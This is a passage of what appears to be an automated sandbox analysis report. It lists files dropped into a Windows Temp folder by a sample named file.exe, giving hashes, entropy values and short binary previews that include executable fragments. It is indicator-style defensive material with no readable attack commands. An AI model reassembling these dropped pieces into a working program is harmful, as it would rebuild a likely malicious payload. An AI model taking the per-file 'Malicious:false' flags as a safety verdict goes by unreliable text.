                                                                                                  SHA-512:C8394F128FE1F2697A3D7E6734D4FCD16DD8BA340404029AE67E1B992F019FB43D2B010B807CA42590FD3781D5030BC47FB7C45C0BF72DE80B50BC442EE97380
                                                                                                  Malicious:false
                                                                                                  Preview:essageW....TranslateMessage....DispatchMessageW....LockWindowUpdate..].GetMessageW...BlockInput..&.OpenClipboard...IsClipboardFormatAvailable....GetClipboardData..I.CloseClipboard..V.CountClipboardFormats...EmptyClipboard....SetClipboardData....SetRect...AdjustWindowRectEx..T.CopyImage...SetWindowPos....GetCursorInfo.V.RegisterHotKey..G.ClientToScreen..A.GetKeyboardLayoutNameW....IsCharAlphaW....IsCharAlphaNumericW...IsCharLowerW....IsCharUpperW..X.GetMenuStringW..z.GetSubMenu....GetCaretPos...IsZoomed....MonitorFromPoint.._.GetMonitorInfoW...SetLayeredWindowAttributes....FlashWindow...GetClassLongW...TranslateAcceleratorW...IsDialogMessageW..{.GetSysColor...InflateRect...DrawFocusRect...DrawTextW...FrameRect...DrawFrameControl....FillRect..@.PtInRect....DestroyAcceleratorTable.X.CreateAcceleratorTableW...SetCursor...GetWindowDC.~.GetSystemMetrics....GetActiveWindow.1.CharNextW.3.wsprintfW.J.RedrawWindow....DrawMenuBar...DestroyMenu...SetMenu...GetWindowTextLengthW..j.CreateMenu....IsD

                                                                                                  C:\Users\user\AppData\Local\Temp\Elsewhere

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):21504
                                                                                                  Entropy (8bit):6.4444830986437465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/cfWX2mwcTVmeOwa9XyJZW06WCHAdjs1f9QrEMetI2zbLJSlvuHdUYzGM84qKoiX:CMEMUnLm8dUYzp8HKoqKs45T+5ht7
                                                                                                  MD5:13D593C5754D6F4A8E9AF71BC5FD7436
                                                                                                  SHA1:7C2802EFE0DD30482D5957E1E8974EA9BBC83D62
                                                                                                  SHA-256:B0A17D66F902476BE402A90D0341803C35A5BAD11862EBFFBF142843D7E6A8BD
                                                                                                  SHA-512:EB401457914FDB5FCDB15163A814C2699E95FCF8187B9016A9561E5E41CEBDA83FFDDAEC4B55A0052494466F5F7DF67C9F4A6CADF33A090FEABB73BBCC88FFA0
                                                                                                  Malicious:false
                                                                                                  Preview:F....x........j8.`......$.....'...`..Y..G..o....O..g......`....F..0.......v....J...3...@PV.G(.:.....te..................G(........G(.t..G..G.........,.u.j.h.FL.....1...m..,.u.j.h.FL....,.uXj.h.FL...Q.......u.....3...&..F....._3.^..]...j.P.D$.P......t.......D$.......x..G(.t..E..@..p..~..............................}...v.tx.F...t'H..P.D$..S...f.8.t^.t$....B...f.8.tM.F.....L$.P......D$.;.t.V...l...hH.K..L$......D$...P.%1...L$..D$.......D$..2V....1...(...D.....E..H..I........VR.0..;.t.2...u..u.....2...&..F......E..@....x...........v...Q...>.......U...|...SVW.u..M..M.. ....E.M.E.E..E..E.E.E.h.{L..E................P.u.....I..E...........u..}..M.................u.j...|.I.........h,.I.P.R...YY..............h.{L.P.7...YY.........E.P.M............P.M..l..........t>.}..t.....V...}..tNh(.I..M..C....u..M..u.VW.u..u.........tA.#.U.3................J..}..t.....W........P.u.....I...........2.E.P....I..M.. ....M......_^..[....U..V..M.......P..E.....x3.M........t';.....}.....

                                                                                                  C:\Users\user\AppData\Local\Temp\Ensemble

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):125
                                                                                                  Entropy (8bit):3.915438283623625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:cwX7O72Uqt/vllpfrYZcFTS9n:cwXKqjvVgn
                                                                                                  MD5:596CE3EA9E2A42098635B6783A45C3BC
                                                                                                  SHA1:51A0F934024A3BDF8298DD81DA7504CCC054D72E
                                                                                                  SHA-256:47E13870CE739ADF64B33D403D391E14E29371C084CD243A6AF8386A9BF48AA3
                                                                                                  SHA-512:0106AC3A9DFEE0DFF5A8CB42C2A8979929462B30D5115D3F34A9531D99A333F79F1331D7345A0BF95572F430E76BA10B6F2291550B237CC6537352D5A3275408
                                                                                                  Malicious:false
                                                                                                  Preview:typesfaxincreasecompound..MZ......................@...............................................!..L.!This program cannot b

                                                                                                  C:\Users\user\AppData\Local\Temp\Expenses

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64512
                                                                                                  Entropy (8bit):6.63709531987453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HoaLjzZU6i5HkY5RrVGyanwUhhNpis3aUQzQpOQ2qJdpnVwNxF5J:tfza6iyY5tVGvH7fsUQwHJJX4xF5J
                                                                                                  MD5:A29DC843982AE5D6F39F526AF992C746
                                                                                                  SHA1:F347D40AA331B98A890CF1DC53B81B079AA5A178
                                                                                                  SHA-256:D4C38B731D74A94D6840D655F51AFE3B845627912D7686BF7203D328DBC3E811
                                                                                                  SHA-512:98AC878A752F176D62FBBDC4E3A205DEA744C33B0DF090843C264AC6BD5A863CBE38DC4E15E9DF4B28F4954BA5962C3A7AA6E2D5C720291B3DDC2AD078B5B6C9
                                                                                                  Malicious:false
                                                                                                  Preview:.....f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW......j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.t'<.t#<.t.<.t.<.t.<.t.<.t.<.t.<.t.<.t.2....SW......t=V3.9w u4.w...H.I...t$._...4.I.;.t.....O..j.Y.9...F...|....w.^_[.3..A.......f.A..A..U..E........8.V..t..F.......N..x..t..F...x..t..F..3...t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.8F.t.8F.t..F.9F t}......P....I..........N..V........ E........ E...u........ ......~....... ......~....... ............ .O.........P....I..8...SW.M..i.......I.h......=..I......f..u.h..........f..t..~..u.h.....M.......E..P....h..........f..u.h..........f..t..~..u.h.....M.......E..P.~...j.......f..u.j.......f..t..~..u.j..M.....

                                                                                                  C:\Users\user\AppData\Local\Temp\Film

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34816
                                                                                                  Entropy (8bit):4.686237478132523
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:xa3HwwuBcPTc/mwftIQXoSpu88888888888888888888888888888zv888888k:xaAwuoc/mexe
                                                                                                  MD5:C64C2B97D85DC1E693AC8380A02561B9
                                                                                                  SHA1:3D7A7CA779535DC95884A8DB3D0C219900B80073
                                                                                                  SHA-256:22B3E1A7C825C104CC6E4663F983BAA48B6209C04EEE38B7E5ED24C883595D91
                                                                                                  SHA-512:8CAC7E97AFA2AE76A066BEE29B9607740DEE54FE5DB87BC86C9100ABEA5E58952DFEBAB1E40F3FC9929B82AC0A63AE4103EB83139DB44D29423C930F804373AB
                                                                                                  Malicious:false
                                                                                                  Preview:.....H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:...............................................................................................................<.......<.......<.......U.......U.......U.......L.......L.......L.......L.......................N.......N.......N.......N.......!....u..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..!....Z..0.......0.......0.......0.......@.......@.......J.......J.......J.......J.......J.......D.......D.......D.......D.......I.......I.......I.......I..

                                                                                                  C:\Users\user\AppData\Local\Temp\Geographic

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):56320
                                                                                                  Entropy (8bit):4.954169025998645
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:hGMAGWRqA60dTct4qNn2fhRE9PfKj+wsxyLtVSQsbq:gMaj6iTcohiPfKj+wsxw
                                                                                                  MD5:7A11677FD70F9EF646AD3B1ECC34C6EC
                                                                                                  SHA1:CBCE0D9C083EF29E1859A78AEEBD22EB8BC7098F
                                                                                                  SHA-256:2BD3AB984634CA7092F8C376BC1238D23D1E713FB1614BAF5F216C6515420AB4
                                                                                                  SHA-512:25A2552CB2D5C9AE54C59167323595B2F93FBA218F2BA8CA4A830BAF10A5AFAF0CD77CCA61D61DC3F5B47DF5E7023889229051946E0B9A860073FECFDEA2CE17
                                                                                                  Malicious:false
                                                                                                  Preview:.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................r.r.r.r.r.r.r.r.r.r.r...............................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r............................................

                                                                                                  C:\Users\user\AppData\Local\Temp\Harley

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23552
                                                                                                  Entropy (8bit):6.512785069283945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:FeVrnIhTMdtEo3/Tv1IkV/HwG68pc/v5sPrBzN02WsxkGVY0VlqhO1URH+esp8e/:FXymo3/TpwGHsv5sPrBzN02WsxNVY0Vd
                                                                                                  MD5:A598DA32EC9FBE430A0C33A1AC680E1C
                                                                                                  SHA1:6B1AF135E996D56B24618914733CDE7716B1DC53
                                                                                                  SHA-256:AF5A342B23BF7678578753C7ACEBA58163E4D8BC5A064D57D970A3C306407B81
                                                                                                  SHA-512:66937CFBFF4D7B7D627D99774E37BDCC6152DB87982DB9EE9D1E757FA319508F8FC2B4115CB7DF989757206F23D8AE587C6EF2494580B79AE5D4032B9763AC00
                                                                                                  Malicious:false
                                                                                                  Preview:P.L$..oe...D$...P.u..W....I...j.j..H.....u...L$.....E....I....Q...Z..J...t...t..I8.A.........t..I8.A......z...B.t..@8.@......I._^3.[..]...U..E.SVW.@....0...(....^..C...u..5|#M.....I.....I........E....Pj.....I.....uE.u.........&..F........H..|9...D9.t..@8.@......|9...D9.t..@8.@......V....I...u0.u........&..F........H..|9...D9.t..@8.@.......3P..W..YYV....I..5|#M.....I.....I.Vj.....I...u;.u....7....&.3.B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.@......I._^3.[]...U..E.VWj..@..0.4.......w....u...Y........>3._.F.....^]...U..QQVWh.........YP.M...B...}.3.f...E..@..0......F.h....W.0....I..M..E.P.v....E..(.u.j.P.J...W......._3.^....U..S.].VW.{...s.r..v....0....F..8.C..0.......W...6.......j..F..0....I..u...........>3._.F.....^[]...U..QW.E...Ph....j.h.~L.j.j.h......X.I...u=V.u........&.3.B.V...^.H..|9...D9.t..@8.P..|9...D9.t..@8.@..3._....U.....E..e..VW.@....0...]....V..M...E.B..E..B..E.B..E....b....u..u.....I..E.P.......t.j..E.P.E.P.[....M.P.3....9...H..|9...D9.t..@8.@......|9...D

                                                                                                  C:\Users\user\AppData\Local\Temp\Means

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):61440
                                                                                                  Entropy (8bit):6.661056883889966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:08qcDP8WBosd0bHazf0Tye4Ur2+9BkxXNHMi0O0GmpefK7:0DWyu0uZo2+9BkxXibleE
                                                                                                  MD5:1F09FF6F831773E34531C68138C0280E
                                                                                                  SHA1:85E0BF9DEEEF07F2C3D481B363A4DCDD837BCBBB
                                                                                                  SHA-256:6BCE7BAD45476E1CE91FECD6BD648DEED5E9B7C23DC327E80EE41E7712AB7BD2
                                                                                                  SHA-512:FDE2D0BD2FCF5171FD4662CD802D0B9134C3A90A03703C797DE3130D6EDB229C5F5DCD925C7C6C57BAA7AADA82B3DD6E8186B893921F681E586EFBB6ABC45DB4
                                                                                                  Malicious:false
                                                                                                  Preview:.e.m.e.n.t. .i.s. .m.i.s.s.i.n.g. .".E.n.d.S.w.i.t.c.h.". .o.r. .".C.a.s.e.". .s.t.a.t.e.m.e.n.t...H.".C.o.n.t.i.n.u.e.C.a.s.e.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.h.i.n.g. .".S.e.l.e.c.t.".o.r. .".S.w.i.t.c.h.". .s.t.a.t.e.m.e.n.t.....A.s.s.e.r.t. .F.a.i.l.e.d.!.....O.b.s.o.l.e.t.e. .f.u.n.c.t.i.o.n./.p.a.r.a.m.e.t.e.r...4.I.n.v.a.l.i.d. .E.x.i.t.c.o.d.e. .(.r.e.s.e.r.v.e.d. .f.o.r. .A.u.t.o.I.t. .i.n.t.e.r.n.a.l. .u.s.e.)...+.V.a.r.i.a.b.l.e. .c.a.n.n.o.t. .b.e. .a.c.c.e.s.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....F.u.n.c. .r.e.a.s.s.i.g.n. .n.o.t. .a.l.l.o.w.e.d...*.F.u.n.c. .r.e.a.s.s.i.g.n. .o.n. .g.l.o.b.a.l. .l.e.v.e.l. .n.o.t. .a.l.l.o.w.e.d...........(...0...`.........................................................................................................................................................................................................."".!...............!!.#3S33"!.!! ............$3W3SCS"!..............&#C3W6#bbB!!.........!!$36$$2S433b2.........

                                                                                                  C:\Users\user\AppData\Local\Temp\Moment

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):35840
                                                                                                  Entropy (8bit):6.468742273417834
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:otAak7jbWyw2QH4IYkNe4yU6en8FZ++oUhPtLuyfGby2QTcBMHa9kV6tjwqLDEtk:ow7fWJhNz96en8FZ/oUhPDZcBMHa9kV2
                                                                                                  MD5:C375C2895142B156B4F7B71A016C6D8B
                                                                                                  SHA1:E5165A99047029FD415F7D5801E002BBE1F6D665
                                                                                                  SHA-256:9C9D3482EE9EB7860B0C69C9D68754A33FC65C52E055E8E787486673AB341C2B
                                                                                                  SHA-512:6EAC28CD7A6E84F287F8B35065658B2CA74B48A53CEBB09FD38434D7DC0C93B91FDAB33CEA58387A297B5818DD0BEAE163915B993192AE288A7FB4668340BC90
                                                                                                  Malicious:false
                                                                                                  Preview:}........;........}..E...@..P.u.V.u..u.............}.........;}.u..x..........t.;.....v..Fh............."R...E.;F|..M?...}....K..........M....M.%.....].=....u%............%...............M.].M.M.........M.%....=....u.............%.........M..........u.9U............}...v)........ .L.............M ,K......K......F@.M.....;.......;........C..........E.;...r..... u.......w..F@....;...V....U........C......E.U.........C.3.U.E..Bt..U...Ou..E..............3..E.........U...~......E.........U...h3..E.........U..E........U..C.3....E......U..E..;..H............H+.....U.....,K.....,K..U.E..u..E......}......Y..E..].t4%....=....u%.........%..................E..]....E..H.......}..t0...v+........ .L..E...........M ,K......K..E.........w..F@.M......}........E.ti;........E.;F|...<.........E...%....=.....E.u".........%.........E...........E.9M...v...9M...m...G;.~..4.E....|,;F|..6<.....9M...I...9M...@......G.E.;.~.E..M.;........}.....:...}.....}.......;.}a;F|........8

                                                                                                  C:\Users\user\AppData\Local\Temp\Olive

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72704
                                                                                                  Entropy (8bit):7.997293675616384
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:1536:P63WVS237cc9HY2D67NpiLqC8NLJ+OznoYUO+ghQR8:P63WVS237I2ONJjNLJ+llvDO
                                                                                                  MD5:157B36496A4225E1457EA8339668C2E8
                                                                                                  SHA1:421FA3EC7B1B82CA3B33070209B49A9CA39C7E2F
                                                                                                  SHA-256:45DFDAFEBFAC3FE00A6DBD7029B3AF8D9578D8E70F2ED172F548D4832F987645
                                                                                                  SHA-512:87746469A2888F7891EAA8E2AA336E4579D4780B5848990E74D66FA0993CA529617EEE184365E59456C52789D319A18DD76182887AC20A71CB3AE5C3339DA5F7
                                                                                                  Malicious:false
                                                                                                  Preview:.U..o....E..aJ.....].< ..e...v..F.q7Rh5.s7[x...V.\D.t...'.7....7....P........5.m.'...S.<(Ts..6.g.3...H%..u..F.5..M.....)H..?..m..{...w.w.|._,lB.........M>...W..+:.F.+......?..Q...*.e.59..6..]..L..IH.G].Y.,;6....F1?.*.....W.Vzp.-K..G.T.'(.x.......pi....J...=~Y...CR...:........E1[Iz._.....1.I....'5.?..J.u..T..[;..4]...U,;1.............t.\4.._.W.b../A".4...."./......X....3.....,{H.Y.........<H.w..+c.h...../....z.1.&...............V..]...t...."3..i. 1...6.M..r.-@.\q.T.y.........8.N.....~...h"e +...........-...|-R.#.gM..v.#@...^Gq..coL..=2....8....-...WXo.~.w2ptL.*C...!r.C.....%u..6... .H %..w0....o.B|-.Y..q.;]'.....x;=*...E.8m@.....2T..W..u...Ul.]..[A..OT2..B..N...ull.....>...-x..3...).8d_.UO.yUF..t;.dl.../...C.@^..2s.....R....iG.O/H%?B.CcQ].vJ...)..@7......:..v ....&p..X.F.q[.`...5Q_....n..[%.P..(h.(.}...'.".9."........my.&...t..0.oT..e5.Q.t+..6I..8[.!B6.!....>.$C.....a^....5K....,...%..#..w[....Y.................Fa..#~.i ........U..

                                                                                                  C:\Users\user\AppData\Local\Temp\Provide

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24576
                                                                                                  Entropy (8bit):6.6128670749383565
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:NwMiVVn76VTBrg+8cm0hZtLvQHC4AvAaQJpXuCECW/Zv+PqraAGjNWyIjGuv3NIB:u5ATBrJ8oDLIi7AhJpzEzZGCrRyIjd3U
                                                                                                  MD5:4AE56B1EA9426E108A92773B1D849A9A
                                                                                                  SHA1:C85A0A134FADBAB5D8BCC4F918BE683584BA2E3A
                                                                                                  SHA-256:ED896CBF5263298907D8A47FE2B177AD1B1A93927CDE77B18FA1FDEB51B52313
                                                                                                  SHA-512:94D495A148D8108D5AC31D6D05DAA20EE50132AF5818184F79F2EE274E19F44028AF09ED4C47F7D887F9644B01462E04D018830D842853439DB678AF705EDD52
                                                                                                  Malicious:false
                                                                                                  Preview:0|.}.;u........}..u..M...](.U.js_.C +C....E..E....U...f...E.j._..f....f.2..}..U.;........u....j X;.E.s......CP;SL~..SL.K$....A.;.t.....u....E.f.A..C4.<G;.r..}.......}..u..M...M...](.U..M.jq.C +C....E..E.#..U.^..f..j.X..j f.:..X;..U...}......CP;{L~..{L.K$....A.;.t.....u.. ....E.f.A........9SH.......KH.......".......E..4..IL....j.Z.E.+...............j.X.......S............P............P.......M..W..........T....F +F..U...j.Y.E.3.;..U.j....3.;.....X.....f......f..j.^..f....f......f...I.....KL.....KL..E..U.....E..u../....U..............M.....jEZf9Q.j\Zu.....!j....L..I.."...Y.........M.j\...Z.E..[....E..P....M(.A`......o....U...M...%p........f..j.X..U....u.....M.E..E..M.......>..}.#......;...}...........#.......#..u..........}..X....E.E..Y....},+....M....}..V...j\[;...i...jE[f9^...\...3....]..]........F.j:Yf;.t.j.Yf;.t.j=Yf;...,....U....d....u.........3..E.E(j:.X.Xf9F...S....N.j^Z.M...f9.u..E.E.E.A...M..U.+...................E.M..t.j.Y;...3....3.... ........M......

                                                                                                  C:\Users\user\AppData\Local\Temp\Psychiatry

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14025
                                                                                                  Entropy (8bit):7.987441054592208
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ocJnPPTIIbeFLio+J7fo/pzo58rUeHX9yMaVVj8FFPJrxEKgu6xhPm3oucsutQSV:35PrVbYLio+JL2eneHRaVVsfshPm3dob
                                                                                                  MD5:1B5740767511DFB227EE4394EC636127
                                                                                                  SHA1:C623CD657C2AEB46BC5AD4E74E833D1FA223B2B7
                                                                                                  SHA-256:487A4DA35ECFA61FBEAC8DBD9C9DA4819544C870A48EC104817C592BB1C1F37A
                                                                                                  SHA-512:E086431BF018C184631FE3E492CE79A063272EECF55940B4264F8E7260CD25E0EE9F51786D565628E96B70B0EED91DB084E04025A4C191FC144BD29A06E94C0F
                                                                                                  Malicious:false
                                                                                                  Preview:.VJ...N...vR..0...["!c..{7.`.zO.;.E..}..0&.\.....8.4.h...... .B.. ....#4.".......U...g<.B.B..7sB..@..`.5..i....Q...w.......]B.`...@U...&.8I.8....Crr..`...U.U.\.E....#.9.%.E^]H.z.w.......:........%....JP..jq.*k,.....k..7......I.{-..8...|.\...VR.........w.$S.....[#....q.|....C..>."nz.&........b.n........p....9z......|..V..P:#[..J...x3..n..0..y.*...m.:...9.`._M.....q.h....q.).......o.+..#C.1K......!..\(<`..x....cT9...N.*.........v...u.........V..O..B....x.R(........@..1....h%|.....aV..V....,..<q.....6.*.9.U.b5......:.{.`d|W..4.A.}..l.7tL...| ...(m.'.&..zP..Ms..tk.T.....>....w=...mR$.}..*.+..~..y[s.}Y....u....x.=.....x..0.E.".....[..R....... V.U..NZ..l......Y..[.....\1...^.t.Cv...Zr..]g..............U:..2(>.&<.L...@.s....I.1..H....U..r..#.L..H.....3"...A...,.e..u.k.`.....#.j.....g9.~..a2.l.+..B...W..tA........................<...:..Tc..!%g.Y..}...%].....Y..h.(...t......k..P.b......swo.J.D.029.P...5..P..8...\..2....t^.....z.~w@6k..n....}u....f`

                                                                                                  C:\Users\user\AppData\Local\Temp\Pulling

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8192
                                                                                                  Entropy (8bit):6.656799503621816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:n4mrTFIyADVTcSEuyJ+ISlkaDxp7dQ9k9k6vlGs:4EIyAZTcdl+ISlNx+j69R
                                                                                                  MD5:9BF05E462BD34FD8D07AD1D6C999BC99
                                                                                                  SHA1:B40F67619BB3ADB12D62EF44AA72F765AC4AF057
                                                                                                  SHA-256:E4DA03EF6C2D974042B126C483BC750FC1A6F831B3988E99EC7D82BE33C7999A
                                                                                                  SHA-512:749757694599F5C241D107CC54FB9FC2FC083AD56BDBA60F21A41340795CFAC37FEBA9D3A416287744CA1FB620A42F3A8DBDEAE65A1E6A741E91E33A57419D56
                                                                                                  Malicious:false
                                                                                                  Preview:.......F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3.........F.;B.tO.....B.+.u...~...B.+.u...~...B.+.t.3.......M........N...B.+.t.3........E......3..........~...B.+.u...B...~.+...]...3.......M.........M......1+.u...q...B.+.u...q...B.+.t.3.......M........I...B.+.t.3........E.......V.M..u.......+.u...Q...F.+.t.3.....I...F..M..u.......+.u...I...F..E.....E.....3.^[]...B...B.o"B.+%B...B.C.B.."B..$B.<.B...B..!B.i$B...B...B.K!B..$B.y.B...B.. B..#B...B...B.. B.E#B...B.].B.( B.."B.V.B...B...B.."B.........L$...D$...|$.....<...i....... ....................%(.M..s..D$......%..L........f.n.f.p.............+......vL..$......$.....f...f..G.f..G f..G0f..G@f..GPf..G`f..Gp.................u.....%..L..s>f.n.f.p.... r........G... .. .. s.......tb.|.........G..D$..........t...G.........u.......t...............t ..$.............G.............u.D$....S..QQ......U.k..l$....(VW.{.3.....M.f;.u..C..A....=$.M..........%....j.^=....w.....+j.f......Z..

                                                                                                  C:\Users\user\AppData\Local\Temp\Ranch

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):37888
                                                                                                  Entropy (8bit):6.351472271518469
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:x5/RUIDn1hGNfgN/ROqVlHBjLAbjBVELX2vn0bU7TTF7Fy2UTZ7IVs:XiAh2QOSlh3wTYGvn4Ufp7Q2Ul7J
                                                                                                  MD5:6A2E7DA1FE0B6D4BA04630CD71A7175F
                                                                                                  SHA1:D5EAE8C8AFF5445B0CB9701EE58FC0F948222C3A
                                                                                                  SHA-256:1CEC9DB07DC2944675E16550286A48FEE8EA2FF23B2E14C26AEF171C3587B001
                                                                                                  SHA-512:0C07A214AFCCB8BB6346EF6B1CB679D37B82454CB9AD8D7622142A7703B506965187CA71564009348B20F692A4E8E9F669F7C2C236632CAA4AB03861572F0949
                                                                                                  Malicious:false
                                                                                                  Preview:F......O...{...U..QVW..3.F.O...;....W...G....9G....W...W....E.....G....O......._^....U...dV.u..M..V....x.....X..SWj.3..E...~.._v(.J..y....%X...].."..........&X......&X...F....y.....X...~..v..p.....4...F........u..M..E.PV.].]..E......y....}..........W...F....c.....E.8]....W...M..3...E.8]....W..VP..M......].YYj.^9s....X.....~3..j..s..o_..Y.M.Q........C._[3.^....U..VW.u.......Y.G..p...tG.F....3.G.j.Z.........Q.P_....6..Q.u.P.Vo..j..._............G..._^]...j.X.U...(SVW..}.j.Y.. K....U..H..E.f..u...x............f.DE.f..K...y.E.3..._^f..C[u.....2...U....V.u.W3.G9~....W...F..M..0.....M....._3.^....U..QQV.u.W...~..v..F..H..4......tB...t=......W...F..u....0.P......2.....t._3.^...........u..2......u...V.]......F.....3.@9A.t..y..t..y..t.2..U..VW.}...;.t..~..t..1..W...c.._..^].......u.N.;O.t..w........V........u..1.....^............^.U..E....SVW.H...t..x..D....@.f..@|.f.._..3._^..[]...f..t..?V....U...0SV....M.Wf.E.3.3..u.jdf.E......M......].f93........$.......s.. ....

                                                                                                  C:\Users\user\AppData\Local\Temp\Ringtones

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):44032
                                                                                                  Entropy (8bit):5.635046713265792
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:gl/nqYHjWYPCy8CRrGPL5Eg10uVGHj9/viMxYWDOgZHHVzJWkQxZaT4:gNnqYHjZV8CVGD5EDuVGHj1vtKs51Vql
                                                                                                  MD5:E3E0B837BE28298815201C73FC5A3BAB
                                                                                                  SHA1:8642C3A3BC018A1865FE7A27A2A64155F116EE2D
                                                                                                  SHA-256:9957EED2B201572A696317F22C825099E6753E2F6E3B0EF243BD3431294D007B
                                                                                                  SHA-512:FC129CC7E548E4FE3C54FB1463BCFF1D3EA9EBC9852532850A3E0C7BCDEC7E23C15E4A5E899DB96D9882F4B1AC36495A26E6B9993578A584993AA2B67385D42D
                                                                                                  Malicious:false
                                                                                                  Preview:..I....D$ PW..............Y;.......3.......9u.uz9u.uuV...Ph.....E.3..U..D$...ub..us...|$..D$.P.D$$PW.......uw........t.VP...........t$..E..u............Qh.....u...x.I._^[..]......u...u....t$..|$..R.A......|$..|$......z....u..\$..D)M...............7...h......k..Y..D)M.j,.D$ .D$0V...P...Y..D$40.........D$(....D$L.D$(.D$,.....D$P....PVWS....I..........D$0..........S....I..D$...~.VS....I.;.t.F;t$.|......;............D$ x&.D$(Pj.VS....I...t..D$0....t....y.D$ .T$..N..p..L$$.T$L;t$.}2.|$..D$(Pj.VS....I...t..D$0....t.F;.|.|$..D$ .L$$h....P.F.PQS....I..t$...j..Y.t$.VW........._....:...U..QQSVW.}...(M.W.......0)M......9}.u/3.9............E.P....I.VW.u..u.V..........I..|.u..b....E....tR..D)M...............t<...t7...t2...t-3.9p.t&.E.P....I..D)M..M.V.3.u.....u.V...p....M...E......Q.u.j{W..x.I._^[....U..SVW.u...(M..1.....0)M..u.....>...uA.v..........tA..D)M.....1V......F..t.j.Wh.....3..H.I............V.v.j+.u...x.I._^[]...U......\...SVW.u...(M......u..D$..D$HPV....I..t$L.D$..t$LP.....

                                                                                                  C:\Users\user\AppData\Local\Temp\Ruth

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\file.exe
